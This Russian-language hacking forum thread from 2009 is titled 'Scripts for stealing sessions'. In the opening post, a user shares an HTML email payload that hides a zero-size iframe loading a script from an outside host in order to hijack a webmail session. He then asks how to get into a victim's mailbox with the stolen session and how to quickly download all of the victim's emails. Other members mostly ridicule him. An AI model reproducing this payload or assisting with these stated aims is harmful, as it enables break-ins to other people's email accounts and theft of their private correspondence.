Скрипты для кражи сессии =)

Discussion in 'Уязвимости Mail-сервисов' started by LemoTTT, 25 May 2009.

  1. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Отписываем скрыпты для кражи сессии, сам напишу старый скрипт, посылаеться как HTML:
    HTML:
    <font color=red> Текст </font>  <iframe scr=http://antichat.ru/cgi-bin/s.jpg frameborder=0 width=0 height=0></iframe>
    Есть ли еще что то, и на каких почтовых ящиках проходит?!
    И еще если я украду ссесию, я могу зайти на почту жертвы, только когда она уже онлайн, или в другое время тоже(знаю, что сессия долго не живет)?!
     
    #1 LemoTTT, 25 May 2009
    Last edited: 25 May 2009
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Это называется XSS, о мой юный падаван
     
  3. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Ответьте на 1 вопрос:
    Если я украл сессию, я могу зайти в почтовый ящик жертвы, когда она не онлайн?
    (проверял на своем ящике, когда жертва не онлайн по сессии не заходит)
    и если НЕТ(не могу)- то как можно зайти в ящик жертвы имея сессию, я же не буду каждые 5 мин тыкать онлайн ли она или нет!
     
    #3 LemoTTT, 25 May 2009
    Last edited: 25 May 2009
  4. -Unlocked-

    -Unlocked- Active Member

    Joined:
    6 Dec 2008
    Messages:
    32
    Likes Received:
    222
    Reputations:
    33
    http://forum.antichat.ru/thread88986.html
     
  5. Player#1

    Player#1 Member

    Joined:
    11 Nov 2008
    Messages:
    95
    Likes Received:
    35
    Reputations:
    10
    ОМГ это уже 10 тема автора на эту тему...
     
  6. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    И толку ноль.
     
  7. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    1) Так как можно зайти в ящик жертвы с помошью сессии, если жертва не онлайн!
    2) Вдруг я угадаю время и зайду в ящик жертвы, как мне быстро сохранить все письма к себе(на раб стол или куда то)?Ну тойсть слить всю инфу за пару минут!
     
    1 person likes this.
  8. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    почему ты еще не в бане ><
     
  9. -Unlocked-

    -Unlocked- Active Member

    Joined:
    6 Dec 2008
    Messages:
    32
    Likes Received:
    222
    Reputations:
    33
    Э,братцы..Не раскисайте,знаете ведь,что каникулы начались...
    LemoTTT,
    1. тут лучше промолчать...
    2. никак..имея доступ к сессии и не имея пароля(а его то ты точно не поимеешь,спи3дев сессию),ты не сможешь зайти через почтовый клиент и слить письма на хард..
    Вообщем,читай,практикуйся...